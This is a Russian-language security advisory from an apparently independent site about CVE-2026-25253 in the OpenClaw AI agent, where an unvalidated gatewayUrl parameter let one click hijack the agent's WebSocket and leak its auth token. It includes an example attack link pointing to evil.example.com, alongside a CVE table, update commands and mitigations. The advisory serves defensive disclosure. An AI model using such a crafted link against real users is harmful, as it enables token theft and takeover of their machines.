infoclaw.ru
  • Что такое OpenClaw
  • Установка
  • Навыки
  • Интеграции
  • Сравнения
  • Новости
FAQ
  1. Главная
  2. Безопасность
  3. CVE-2026-25253: критическая уязвимость OpenClaw и как защититься
Безопасность

CVE-2026-25253: критическая уязвимость OpenClaw и как защититься

CVE-2026-25253 (CVSS 8.8) позволяла перехватить токен аутентификации одним кликом. Как проверить версию OpenClaw и обновиться до безопасного релиза.

18 марта 2026 г. · 4 мин чтения
CVE-2026-25253: критическая уязвимость OpenClaw и как защититься

Что произошло: CVE-2026-25253 в OpenClaw

18 марта 2026 года исследователи зафиксировали, что более 12 800 экземпляров OpenClaw по-прежнему уязвимы к атаке, описанной в CVE-2026-25253, — несмотря на то что патч вышел ещё в конце января. Эта уязвимость получила оценку CVSS 8.8 и считается наиболее опасной из раскрытых в начале 2026 года.

Суть проблемы: Control UI OpenClaw принимал параметр gatewayUrl напрямую из query-строки URL — без какой-либо валидации. Злоумышленник мог сформировать ссылку вида:

http://localhost:3000/?gatewayUrl=ws://evil.example.com/ws

Один клик по такой ссылке — и WebSocket-соединение OpenClaw переадресовывалось на сервер атакующего. В момент установки соединения передавался токен аутентификации. Итог: полный контроль над машиной жертвы без какого-либо взаимодействия пользователя, кроме перехода по ссылке.

Уязвимость обнаружили и описали специалисты SonicWall, runZero и Immersive Labs; материал получил широкое освещение на Dark Reading.


Таблица CVE в OpenClaw 2026 года

Патч версии 2026.1.29 закрыл сразу несколько критических проблем. В 2026 году было зафиксировано более 100 CVE для OpenClaw; ниже — наиболее серьёзные из известных на дату публикации:

CVECVSSОписание
CVE-2026-252538.8Перехват WebSocket через неvalидированный gatewayUrl
CVE-2026-247638.8Инъекция команд в Docker sandbox через небезопасную обработку PATH
CVE-2026-284669.4Критическая уязвимость (детали раскрыты частично)
CVE-2026-284749.3Критическая уязвимость
CVE-2026-283919.2Критическая уязвимость
CVE-2026-284469.2Критическая уязвимость

Полный трекер CVE доступен на GitHub: jgamblin/OpenClawCVEs.

Обратите внимание: CVE-2026-24763 (CVSS 8.8) закрывалась тем же патчем 2026.1.29 и связана с небезопасной обработкой переменной PATH в Docker-окружении — злоумышленник мог выполнить произвольные команды внутри sandbox.


Как проверить версию OpenClaw

Шаг 1. Найдите текущую версию

Откройте интерфейс OpenClaw, перейдите в Settings → About или выполните в терминале:

openclaw --version

Если вы используете Docker-образ, проверьте тег запущенного контейнера:

docker ps --format "table {{.Image}}\t{{.Names}}"

Шаг 2. Сравните с безопасным релизом

Минимально безопасная версия — 2026.1.29. Если у вас более ранний релиз — система уязвима к CVE-2026-25253 и CVE-2026-24763.

Шаг 3. Обновите OpenClaw

Способ обновления зависит от метода установки:

Установка через Desktop App: Откройте меню → Check for Updates. Либо скачайте актуальный релиз с официального сайта OpenClaw.

Установка через npm:

npm update -g openclaw

Docker:

docker pull openclaw/openclaw:latest
docker compose down && docker compose up -d

Подробнее об установке — в материале Установка OpenClaw на Windows и руководстве Первый запуск OpenClaw.


Временные меры до обновления

Если немедленное обновление невозможно, примите следующие меры:

  1. Не переходите по ссылкам, содержащим параметр gatewayUrl в URL OpenClaw-интерфейса.
  2. Ограничьте доступ к порту Control UI на уровне файрвола — разрешите только 127.0.0.1.
  3. Отключите удалённый доступ к интерфейсу, если он не нужен.
  4. Проверьте активные сессии и при подозрении на компрометацию немедленно отозвите токены.

Также рекомендуем изучить общие вопросы прав доступа в статье Разрешения и доступ в OpenClaw.


Почему 12 800 экземпляров остались непропатченными

По данным мониторинга от 18 марта 2026, через полтора месяца после выхода патча уязвимы оставались тысячи инсталляций. Причины типичны:

  • Автообновления отключены или работают нестабильно.
  • Инсталляции через Docker не обновляются без явной команды pull.
  • Часть пользователей не отслеживает бюллетени безопасности OpenClaw.
  • Корпоративные окружения требуют тестирования перед обновлением.

Ситуацию усугубляет то, что OpenClaw по умолчанию открывает интерфейс на внешний адрес — подробнее об этом риске читайте в разделе Приватность и локальный запуск.


Вывод

CVE-2026-25253 — наглядный пример атаки с минимальным порогом входа: жертве достаточно перейти по ссылке. Обновление до версии 2026.1.29 устраняет эту угрозу, однако общий ландшафт CVE в OpenClaw в 2026 году остаётся напряжённым — четыре уязвимости с CVSS 9.0+ зафиксированы только за первый квартал.

Включите автообновления, следите за трекером jgamblin/OpenClawCVEs и настройте сетевую изоляцию согласно рекомендациям из статьи Разрешения и доступ в OpenClaw.

Теги: CVEуязвимостьбезопасностьобновлениеCVSSWebSocketтокен
💰
Инструмент Калькулятор стоимости AI-моделей Сравните цены GPT-4o, Claude, DeepSeek за минуту
→
🎯
Квиз · 2 мин Какой OpenClaw подходит вам? 5 вопросов — персональная рекомендация
→

Популярное

  1. Moltbook: соцсеть для AI-агентов с 1,5 миллиона ботов Что такое OpenClaw
  2. OpenClaw купил автомобиль: как AI-агент сэкономил $4,200 Сценарии использования
  3. Multi-agent в OpenClaw: как запустить команду AI-агентов Сценарии использования
  4. Что такое OpenClaw: полный гид по первому вирусному ИИ-агенту 2026 года Что такое OpenClaw
  5. OpenClaw 2026.6.6-beta.1: Существенное повышение безопасности и стабильности Новости

Категории

  • Что такое OpenClaw (8)
  • Установка (16)
  • Навыки (11)
  • Интеграции (15)
  • Сравнения (9)
  • Сценарии использования (22)
  • Новости (66)
  • Enterprise / NemoClaw (7)
  • Безопасность (10)
  • Сообщество (1)
  • Для разработчиков (6)
  • Вопросы и ответы (2)
  • Глоссарий (4)

Недавнее

  • OpenClaw 2026.6.6-beta.1: Существенное повышение безопасности и стабильности сегодня
  • Обновление OpenClaw 2026.6.5: улучшенная стабильность и новый встроенный поисковый провайдер Parallel вчера
  • Обновление OpenClaw 2026.6.5-beta.5: повышение надёжности и новые возможности интеграций 2 дн. назад

Быстрый старт

Новичок в OpenClaw? Начните отсюда:

  • → Что такое OpenClaw
  • → Установка за 10 минут
  • → Топ-10 навыков
  • → Подключить Telegram

Теги

установканавыкиtelegramwhatsappmacoswindowsenterpriseголосopen-sourcellmprivacynode.js
infoclaw.ru

Независимый информационный ресурс об ИИ-агенте OpenClaw. Статьи, гайды и новости на русском языке.

Разделы

  • Что такое OpenClaw
  • Установка
  • Навыки
  • Интеграции
  • Сравнения
  • Enterprise
  • Безопасность
  • Новости

Интеграции

  • Telegram
  • WhatsApp
  • Slack
  • Discord
  • iMessage
  • Teams
  • Matrix
  • Все (20+) →

Ресурсы

  • Вопросы и ответы
  • Глоссарий
  • Для разработчиков
  • Сообщество
  • Карта сайта

© 2026 infoclaw.ru — Независимый ресурс. Не является официальным сайтом проекта OpenClaw.

Политика конфиденциальности Пользовательское соглашение Контакты